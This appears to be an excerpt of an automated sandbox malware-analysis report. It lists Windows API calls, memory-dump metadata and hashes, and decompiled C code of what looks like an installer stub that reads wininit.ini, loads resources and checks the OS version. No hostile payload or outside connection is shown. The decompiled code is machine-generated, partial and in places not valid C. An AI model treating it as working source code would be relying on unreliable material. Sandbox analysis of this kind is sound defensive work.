                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3afe
                                                                                                                                                                                                        0x00de3a87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3a87
                                                                                                                                                                                                        0x00de3aa8
                                                                                                                                                                                                        0x00de3ab3
                                                                                                                                                                                                        0x00de3ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3ab9
                                                                                                                                                                                                        0x00de3a78
                                                                                                                                                                                                        0x00de3a82
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DE2F64,?,00000002,00000000), ref: 00DE3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00DE3AB3
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00DE3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00DE3B13
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FindResourceA.KERNEL32(00DE0000,000007D6,00000005), ref: 00DE652A
                                                                                                                                                                                                          • Part of subcall function 00DE6517: LoadResource.KERNEL32(00DE0000,00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DE6538
                                                                                                                                                                                                          • Part of subcall function 00DE6517: DialogBoxIndirectParamA.USER32(00DE0000,00000000,00000547,00DE19E0,00000000), ref: 00DE6557
                                                                                                                                                                                                          • Part of subcall function 00DE6517: FreeResource.KERNEL32(00000000,?,?,00DE2EE8,00000000,00DE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DE6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00DE3100,00000000,00000000), ref: 00DE3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: c9e9e3804d3501dd5f90d3b45e8687711d3d99621e77ddbfe7e8bbc8a85ff02e
                                                                                                                                                                                                        • Instruction ID: 1f7745c72572ae45a2488ea3e44ca32a983b50ec5a30e83e12daa8c354efeac1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9e9e3804d3501dd5f90d3b45e8687711d3d99621e77ddbfe7e8bbc8a85ff02e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77117F303013C1AFD720BF37AC4DE2B7AA9DBD9750B10442EB646DE3A1DA79D8009674
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E00DE658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00de24e0
                                                                                                                                                                                                        0x00de24eb
                                                                                                                                                                                                        0x00de24f2
                                                                                                                                                                                                        0x00de24f7
                                                                                                                                                                                                        0x00de2504
                                                                                                                                                                                                        0x00de250e
                                                                                                                                                                                                        0x00de251d
                                                                                                                                                                                                        0x00de252c
                                                                                                                                                                                                        0x00de2541
                                                                                                                                                                                                        0x00de2546
                                                                                                                                                                                                        0x00de2553
                                                                                                                                                                                                        0x00de2555
                                                                                                                                                                                                        0x00de2555
                                                                                                                                                                                                        0x00de2546
                                                                                                                                                                                                        0x00de256c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00DE2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00DE252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 00DE253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00DE254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00DE2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: f28c06267c832478de6376628186957094fb0258d4bf0c605803f4eda981464f
                                                                                                                                                                                                        • Instruction ID: 71368d0ba7eb6d061ebbbd7967065b9a6a012c15f76b8bf2b834dced81748dcc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f28c06267c832478de6376628186957094fb0258d4bf0c605803f4eda981464f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A01F5326002986BC720BB6A9C4DEEF7B7CDB81760F000155FA49D7290DE749E45CAB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00DE36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xde8184 = 1;
                                                                                                                                                                                                        						 *0xde8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xde9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xde8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00DE2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00DE2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xde8a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xde8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("cent");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E00DE681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E00DE67C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E00DE28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xde9a40 = _t119;
                                                                                                                                                                                                        						 *0xde8184 = 1;
                                                                                                                                                                                                        						 *0xde8180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xde9a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xde8184 = _t135;
                                                                                                                                                                                                        							 *0xde8180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E00DE44B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00DE6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00de36f9
                                                                                                                                                                                                        0x00de3700
                                                                                                                                                                                                        0x00de370c
                                                                                                                                                                                                        0x00de3716
                                                                                                                                                                                                        0x00de3718
                                                                                                                                                                                                        0x00de371b
                                                                                                                                                                                                        0x00de3721
                                                                                                                                                                                                        0x00de372b
                                                                                                                                                                                                        0x00de373d
                                                                                                                                                                                                        0x00de3745
                                                                                                                                                                                                        0x00de3746
                                                                                                                                                                                                        0x00de3746
                                                                                                                                                                                                        0x00de3749
                                                                                                                                                                                                        0x00de37ab
                                                                                                                                                                                                        0x00de37ad
                                                                                                                                                                                                        0x00de37ae
                                                                                                                                                                                                        0x00de37b3
                                                                                                                                                                                                        0x00de37b8
                                                                                                                                                                                                        0x00de37b8
                                                                                                                                                                                                        0x00de37bf
                                                                                                                                                                                                        0x00de37bf
                                                                                                                                                                                                        0x00de37c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de37cb
                                                                                                                                                                                                        0x00de37cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de37d5
                                                                                                                                                                                                        0x00de37db
                                                                                                                                                                                                        0x00de37e8
                                                                                                                                                                                                        0x00de37ea
                                                                                                                                                                                                        0x00de37ea
                                                                                                                                                                                                        0x00de37ea
                                                                                                                                                                                                        0x00de37f0
                                                                                                                                                                                                        0x00de37f6
                                                                                                                                                                                                        0x00de3805
                                                                                                                                                                                                        0x00de3817
                                                                                                                                                                                                        0x00de382b
                                                                                                                                                                                                        0x00de3830
                                                                                                                                                                                                        0x00de3836
                                                                                                                                                                                                        0x00de383b
                                                                                                                                                                                                        0x00de383d
                                                                                                                                                                                                        0x00de38eb
                                                                                                                                                                                                        0x00de38eb
                                                                                                                                                                                                        0x00de38f2
                                                                                                                                                                                                        0x00de390c
                                                                                                                                                                                                        0x00de3911
                                                                                                                                                                                                        0x00de3911
                                                                                                                                                                                                        0x00de3913
                                                                                                                                                                                                        0x00de394d
                                                                                                                                                                                                        0x00de394d
                                                                                                                                                                                                        0x00de394f
                                                                                                                                                                                                        0x00de38a9
                                                                                                                                                                                                        0x00de38a9
                                                                                                                                                                                                        0x00de38b0
                                                                                                                                                                                                        0x00de38b2
                                                                                                                                                                                                        0x00de38b9
                                                                                                                                                                                                        0x00de38bb
                                                                                                                                                                                                        0x00de38c1
                                                                                                                                                                                                        0x00de3975
                                                                                                                                                                                                        0x00de38c7
                                                                                                                                                                                                        0x00de38de
                                                                                                                                                                                                        0x00de38e0
                                                                                                                                                                                                        0x00de38e0
                                                                                                                                                                                                        0x00de397b
                                                                                                                                                                                                        0x00de397d
                                                                                                                                                                                                        0x00de39a9
                                                                                                                                                                                                        0x00de397f
                                                                                                                                                                                                        0x00de3982
                                                                                                                                                                                                        0x00de398b
                                                                                                                                                                                                        0x00de398d
                                                                                                                                                                                                        0x00de398f
                                                                                                                                                                                                        0x00de399f
                                                                                                                                                                                                        0x00de39a1
                                                                                                                                                                                                        0x00de3991
                                                                                                                                                                                                        0x00de3991
                                                                                                                                                                                                        0x00de3991
                                                                                                                                                                                                        0x00de398f
                                                                                                                                                                                                        0x00de39af
                                                                                                                                                                                                        0x00de39b6
                                                                                                                                                                                                        0x00de3a0f
                                                                                                                                                                                                        0x00de3a0f
                                                                                                                                                                                                        0x00de3a11
                                                                                                                                                                                                        0x00de3a13
                                                                                                                                                                                                        0x00de3a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39b8
                                                                                                                                                                                                        0x00de39b8
                                                                                                                                                                                                        0x00de39ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39bc
                                                                                                                                                                                                        0x00de39bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39c3
                                                                                                                                                                                                        0x00de39c9
                                                                                                                                                                                                        0x00de39ce
                                                                                                                                                                                                        0x00de39d0
                                                                                                                                                                                                        0x00de39e3
                                                                                                                                                                                                        0x00de39e5
                                                                                                                                                                                                        0x00de39e6
                                                                                                                                                                                                        0x00de39f1
                                                                                                                                                                                                        0x00de39f7
                                                                                                                                                                                                        0x00de39fa
                                                                                                                                                                                                        0x00de3a01
                                                                                                                                                                                                        0x00de3a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3a06
                                                                                                                                                                                                        0x00de3a09
                                                                                                                                                                                                        0x00de3a09
                                                                                                                                                                                                        0x00de3a0b
                                                                                                                                                                                                        0x00de3a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3a09
                                                                                                                                                                                                        0x00de39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39fc
                                                                                                                                                                                                        0x00de39d3
                                                                                                                                                                                                        0x00de39d8
                                                                                                                                                                                                        0x00de39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39dc
                                                                                                                                                                                                        0x00de39b6
                                                                                                                                                                                                        0x00de3955
                                                                                                                                                                                                        0x00de395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
